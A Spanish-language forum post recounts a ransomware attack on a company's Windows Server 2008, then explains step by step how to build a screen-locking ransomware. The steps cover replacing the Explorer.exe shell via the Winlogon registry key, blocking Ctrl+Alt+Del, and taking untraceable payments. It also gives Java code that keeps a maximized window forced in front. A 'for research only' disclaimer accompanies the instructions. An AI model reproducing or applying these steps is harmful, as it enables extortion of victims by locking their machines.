Autor Tema: ransomware  (Leído 2984 veces)

0 Usuarios y 1 Visitante están viendo este tema.

12_v0lt5

  • ***
  • Mensajes: 428
  • Liked: 46
ransomware
« : junio 29, 2014, 11:00:26 pm »
SAludos, voy a hablar de un tipo de ataque al que me enfrente hace poco a un nivel mas alto que el conocido ransomware de la policía el cual ya muchos conocen.

Les platico. Fui llamado por una empresa que tenia un problema muy grave con su server ya que no se podía acceder a el al ver el monitor me di cuenta de que era un ransomware. Pantalla completa con un texto en ingles y teclado bloqueado. Bueno el texto pedía $5000.00 dólares americanos por liberar el sistema, ya que decía que se encontraba completamente encriptado. Logre eliminar el archivo del inicio pero, mi sorpresa fue que en realidad tenia todos los archivos encriptados, una encriptacion alta usando el conocido programa winrar la cual pedía 2 llaves la que yo tenia y la que tenia el "secuestrador" para generar la clave de los archivos encriptados.

Busque la información por medio de archivos "borrados" otra sorpresa se uso un pequeño programa que hace un borrado real de los archivos, cada vez me sentía peor por que no podía solucionar el problema.

Al final solo logre quitar el bloqueo y se decidió usar un respaldo de meses atrás.

¿Como fue que atacaron y que hicieron?
-Entraron usando una vulnerabilidad de windows server 2008 que aprovecha un problema de acceso por escritorio remoto
-Comprimieron y encriptaron todos los archivos que no eran de sistema incluyendo archivos de programas
-Eliminaron los archivos de forma real con un software adicional, por cierto es gnu gpl
-Al final metieron la famosa ventanita y esperar que la victima se contactara

El esquema es muy sencillo, voy a explicar como hacerlo sin afectar archivos, claro el ataque  es para winbugs.

Lo primero es tener algún acceso, puede ser por alguna vulnerabilidad, correo, pagina web infectada, troyanos etc.
El pequeño programa afecta generalmente el archivo Explorer.exe que se encuentra en el registro no recuerdo la ruta completa pero busquen winlogon.
Esto asegura que no se ejecute nada me refiero a escritorio ventanas etc.
Si quieren asegurar un poco mas el ataque pueden modificar o bloquear la combinación crt+alt+supr para evitar que abran el administrador de tareas.

Ahora debemos de cambiar nuestro ejecutable Explorer.exe por el programa que mostrara la pc bloqueada, al ser un "secuestro" ahí puedes poner datos de pago o algo mas es lo que hacen comúnmente los atacantes, los pagos o son irrastreables por medios como western unión, moneygram o el sistema de pago alemán que sale con el virus de la policía.

Les añado un código fuente en java que me encontré en internet y puede ser modificado para esto, les recuerdo que esto es solo para investigación, no lo usen con fines maliciosos

Cualquier duda o aportación es bien recibida


Código: [Seleccionar]
import java.util.concurrent.Executors;
import java.util.concurrent.ScheduledExecutorService;
import java.util.concurrent.TimeUnit;
import javax.swing.JFrame;
/**
 * @web http://www.jc-mouse.net/
 * @author Mouse
 */
public class jBlocked {

    private JFrame jframe=null;

    /**
 * Constructor de clase
 */
    public jBlocked( JFrame f )
    {
        this.jframe = f;
    }

    /**
 * ejecuta una tarea cada "n" tiempo
 * Para evitar que el usuario utilice las teclas (WINDOWS + D)(TAB) y asi perder el foco
 * de la aplicación, cada 50 milisegundos se envia el JFrame al frente y se cambia su propiedad a maximizado
 */
    public void block()
    {
        ScheduledExecutorService scheduler = Executors.newSingleThreadScheduledExecutor();
        scheduler.scheduleAtFixedRate(
            new Runnable()
            {
                @Override
                public void run() {                   
                    front();
                }
              }, 500, 50 , TimeUnit.MILLISECONDS ); //comienza dentro de 1/2 segundo y luego se repite cada N segundos
    }

    /**
 *
 */
    public void front()
    {
        jframe.setExtendedState( JFrame.MAXIMIZED_BOTH );//maximizado
        jframe.toFront();
    }

}//--> fin
La información es poder!